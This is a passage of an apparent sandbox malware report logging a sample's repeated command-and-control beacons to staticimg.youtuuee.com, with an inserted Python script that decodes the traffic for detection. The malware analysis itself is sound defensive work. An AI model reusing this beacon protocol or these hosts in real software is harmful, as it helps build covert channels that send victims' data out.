  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:52 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

38 192.168.2.5 49792 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:52.784478903 CEST  1437  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:52.932136059 CEST  1437  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:52 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 31 37 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 79 79 64 7a 35 63 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2151177,"time":1635061612,"rand_str":"yydz5c"}0

Oct 24, 2021 09:46:52.938849926 CEST  1437  OUT
  POST /api/?sid=2151177&key=a71f58dbe888f846ae5846e444e1e656 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com


Oct 24, 2021 09:46:53.089015007 CEST  1438  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:53 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0


Session ID Source IP Source Port Destination IP Destination Port Process

39 192.168.2.5 49793 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:53.411200047 CEST  1439  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:53.569130898 CEST  1439  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:53 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 32 30 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 66 78 51 4e 6e 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2151209,"time":1635061613,"rand_str":"FfxQNn"}0

Oct 24, 2021 09:46:53.582036972 CEST  1440  OUT
  POST /api/?sid=2151209&key=414c662eb1fa32ce4fe76d6805230a51 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:53.740051985 CEST  1440  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:53 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

4 192.168.2.5 49752 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:16.084330082 CEST  1327  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:16.232496023 CEST  1327  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:16 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 33 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 57 4a 74 4b 61 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2149343,"time":1635061576,"rand_str":"uWJtKa"}0

Oct 24, 2021 09:46:16.322035074 CEST  1328  OUT
  POST /api/?sid=2149343&key=522b94416aa18897bef2f92ed75a7b55 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com


Oct 24, 2021 09:46:16.475416899 CEST  1328  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:16 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0


Session ID Source IP Source Port Destination IP Destination Port Process

40 192.168.2.5 49794 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:54.040618896 CEST  1441  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:54.190620899 CEST  1442  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:54 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 32 36 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 49 51 4e 7a 37 6a 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2151265,"time":1635061614,"rand_str":"IQNz7j"}0

Oct 24, 2021 09:46:54.211215019 CEST  1442  OUT
  POST /api/?sid=2151265&key=03d3bf4050b9f515c87ca732bd77f2cf HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:54.366297960 CEST  1443  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:54 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

41 192.168.2.5 49795 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:54.667601109 CEST  1444  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:54.817378044 CEST  1444  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:54 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 31 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 48 71 65 56 78 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2151319,"time":1635061614,"rand_str":"RHqeVx"}0

Oct 24, 2021 09:46:54.836503983 CEST  1444  OUT
  POST /api/?sid=2151319&key=1a5f4c87eb0f37dc049eed9c4db37b02 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com


Oct 24, 2021 09:46:54.991520882 CEST  1445  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:54 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0


Session ID Source IP Source Port Destination IP Destination Port Process

42 192.168.2.5 49796 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:55.309187889 CEST  1446  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:55.454819918 CEST  1446  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:55 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 35 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 72 41 59 4b 52 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2151359,"time":1635061615,"rand_str":"RrAYKR"}0

Oct 24, 2021 09:46:55.464891911 CEST  1447  OUT
  POST /api/?sid=2151359&key=8e5b3dc2ab7f04f2eb1218fc34b05518 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:55.617041111 CEST  1447  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:55 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

43 192.168.2.5 49797 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:55.933140039 CEST  1448  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:56.081788063 CEST  1449  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:56 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 39 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 49 45 52 65 35 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2151395,"time":1635061615,"rand_str":"hIERe5"}0

Oct 24, 2021 09:46:56.098254919 CEST  1449  OUT
  POST /api/?sid=2151395&key=908b7d52946ed1fe1b4d90f6042b182f HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com


Oct 24, 2021 09:46:56.249144077 CEST    1450 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\n{"status":3}\r\n0\r\n\r\n

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
44          192.168.2.5  49798        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data

Oct 24, 2021 09:46:56.575320005 CEST    1451 kB    OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:56.724689960 CEST    1451 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 34 32 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 37 34 4e 57 47 71 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35\r\n{"sid":2151425,"time":1635061616,"rand_str":"74NWGq"}\r\n0\r\n\r\n

Oct 24, 2021 09:46:56.739645004 CEST    1451 kB    OUT
POST /api/?sid=2151425&key=ac504e0e07f53c6f4b545780dc221950 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:56.894335032 CEST    1452 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\n{"status":3}\r\n0\r\n\r\n
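Every session in this table follows the same two-step loop: a GET /api/fbtime that returns a server-issued sid, a Unix time and a rand_str, then a POST /api/?sid=...&key=... that echoes that sid and is answered with {"status":3}. The script below is an added example, not code from the Joe Sandbox report or from the analysed sample: it decodes the chunked "Data Raw" hex of the two responses, pairs each fbtime reply with the POST that echoes its sid, and derives the traits a detection rule could key on (32-character lowercase hex key, sub-second request cycle, server time in step with the sandbox clock). The CAPTURE rows are transcribed from sessions 43 and 44 above with timestamps cut to microseconds; CEST is assumed to be UTC+2 (the Date headers are two hours behind the sandbox timestamps); the 289-byte POST body is not reproduced in the report and is therefore not modelled. All function and field names are this example's own.

```python
# Added example, not from the Joe Sandbox report or the analysed sample.
# CAPTURE is transcribed from sessions 43 and 44 of the HTTP Packets table
# (timestamps cut to microseconds); all names below are this example's own.
import json
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

CEST = timezone(timedelta(hours=2))   # sandbox clock; Date headers are 2 h behind it
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# (sandbox timestamp, direction, HTTP start line, "Data Raw" hex of the body or None)
CAPTURE = [
    ("2021-10-24 09:46:55.933140", "OUT", "GET /api/fbtime HTTP/1.1", None),
    ("2021-10-24 09:46:56.081788", "IN", "HTTP/1.1 200 OK",
     "33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 39 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 "
     "36 31 36 31 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 49 45 52 65 35 22 7d 0d 0a 30 0d 0a 0d 0a"),
    ("2021-10-24 09:46:56.098254", "OUT",
     "POST /api/?sid=2151395&key=908b7d52946ed1fe1b4d90f6042b182f HTTP/1.1", None),
    ("2021-10-24 09:46:56.249144", "IN", "HTTP/1.1 200 OK",
     "63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a"),
    ("2021-10-24 09:46:56.575320", "OUT", "GET /api/fbtime HTTP/1.1", None),
    ("2021-10-24 09:46:56.724689", "IN", "HTTP/1.1 200 OK",
     "33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 34 32 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 "
     "36 31 36 31 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 37 34 4e 57 47 71 22 7d 0d 0a 30 0d 0a 0d 0a"),
    ("2021-10-24 09:46:56.739645", "OUT",
     "POST /api/?sid=2151425&key=ac504e0e07f53c6f4b545780dc221950 HTTP/1.1", None),
    ("2021-10-24 09:46:56.894335", "IN", "HTTP/1.1 200 OK",
     "63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a"),
]

def decode_chunked(raw_hex: str) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body from the 'Data Raw' hex dump."""
    data, body, pos = bytes.fromhex(raw_hex), bytearray(), 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)  # hex chunk size, extensions ignored
        pos = eol + 2
        if size == 0:                                  # last-chunk marker
            return bytes(body)
        body += data[pos:pos + size]
        pos += size + 2                                # step over the chunk's CRLF

def to_epoch(ts: str) -> float:
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f").replace(tzinfo=CEST).timestamp()

@dataclass
class Beacon:
    sid: int
    rand_str: str
    key: str
    status: int
    sent_at: float       # epoch of the GET /api/fbtime
    round_trip_s: float  # GET sent until the POST reply arrived
    clock_skew_s: float  # server 'time' minus sent_at; the server reports whole seconds

def correlate(capture) -> list:
    """Pair each GET /api/fbtime with the POST /api/?sid=...&key=... that echoes its sid."""
    beacons, cur = [], None
    for ts, direction, start_line, raw in capture:
        target = start_line.split(" ")[1]
        if direction == "OUT" and target == "/api/fbtime":
            cur = {"sent_at": to_epoch(ts)}
        elif direction == "IN" and cur is not None and "sid" not in cur:
            cur.update(json.loads(decode_chunked(raw)))   # sid, time, rand_str
        elif direction == "OUT" and target.startswith("/api/?"):
            qs = parse_qs(urlsplit(target).query)
            sid, key = int(qs["sid"][0]), qs["key"][0]
            if cur is None or sid != cur.get("sid"):
                raise ValueError(f"POST sid {sid} does not echo the sid the server issued")
            cur["key"] = key
        elif direction == "IN" and cur is not None and "key" in cur:
            status = json.loads(decode_chunked(raw))["status"]
            beacons.append(Beacon(cur["sid"], cur["rand_str"], cur["key"], status,
                                  cur["sent_at"], to_epoch(ts) - cur["sent_at"],
                                  cur["time"] - cur["sent_at"]))
            cur = None
    return beacons

def indicators(beacons) -> dict:
    """Traits of the loop that a detection rule can key on, derived from the pairs."""
    gaps = [b.sent_at - a.sent_at for a, b in zip(beacons, beacons[1:])]
    return {
        "all_keys_32_hex": all(HEX32.match(b.key) is not None for b in beacons),
        "all_status_3": all(b.status == 3 for b in beacons),
        "server_clock_in_step": all(abs(b.clock_skew_s) < 1.0 for b in beacons),
        "sub_second_cycles": all(b.round_trip_s < 1.0 for b in beacons),
        "mean_gap_s": round(sum(gaps) / len(gaps), 3) if gaps else None,
    }

if __name__ == "__main__":
    bs = correlate(CAPTURE)
    print(*bs, indicators(bs), sep="\n")
```

The sid check is the part worth carrying into a rule: the server issues a fresh sid on every fbtime call and the next POST must echo it, so a proxy log where POSTs carry repeated or stale sids would not match this sample's loop. The key is only tested for shape (32 lowercase hex characters), because the report does not show how it is derived.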

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
45          192.168.2.5  49799        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data

Oct 24, 2021 09:46:57.241782904 CEST    1453 kB    OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:57.387552977 CEST    1453 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 34 37 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 32 6b 61 45 51 55 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35\r\n{"sid":2151471,"time":1635061617,"rand_str":"2kaEQU"}\r\n0\r\n\r\n

Oct 24, 2021 09:46:57.398885012 CEST    1454 kB    OUT
POST /api/?sid=2151471&key=e2e363a560e1822402bad2f0fc58fa96 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
46          192.168.2.5  49800        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
47          192.168.2.5  49801        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
48          192.168.2.5  49802        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
49          192.168.2.5  49803        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data
No HTTP packets are listed for sessions 46 to 49 in the report.

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
5           192.168.2.5  49753        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data

Oct 24, 2021 09:46:17.334026098 CEST    1329 kB    OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:17.487363100 CEST    1330 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 34 32 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 79 54 41 42 68 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35\r\n{"sid":2149425,"time":1635061577,"rand_str":"RyTABh"}\r\n0\r\n\r\n

Oct 24, 2021 09:46:17.528027058 CEST    1330 kB    OUT
POST /api/?sid=2149425&key=2975b649e6fdf9d69b74a57abb0bc8dd HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:17.678673983 CEST    1331 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\n{"status":3}\r\n0\r\n\r\n

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
50          192.168.2.5  49804        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
51          192.168.2.5  49805        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
52          192.168.2.5  49806        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
53          192.168.2.5  49807        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
54          192.168.2.5  49808        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
55          192.168.2.5  49810        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
56          192.168.2.5  49814        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
57          192.168.2.5  49818        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
58          192.168.2.5  49821        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
59          192.168.2.5  49825        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data
No HTTP packets are listed for sessions 50 to 59 in the report.

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
6           192.168.2.5  49754        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data

Oct 24, 2021 09:46:18.505224943 CEST    1332 kB    OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:18.648884058 CEST    1332 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:18 GMT
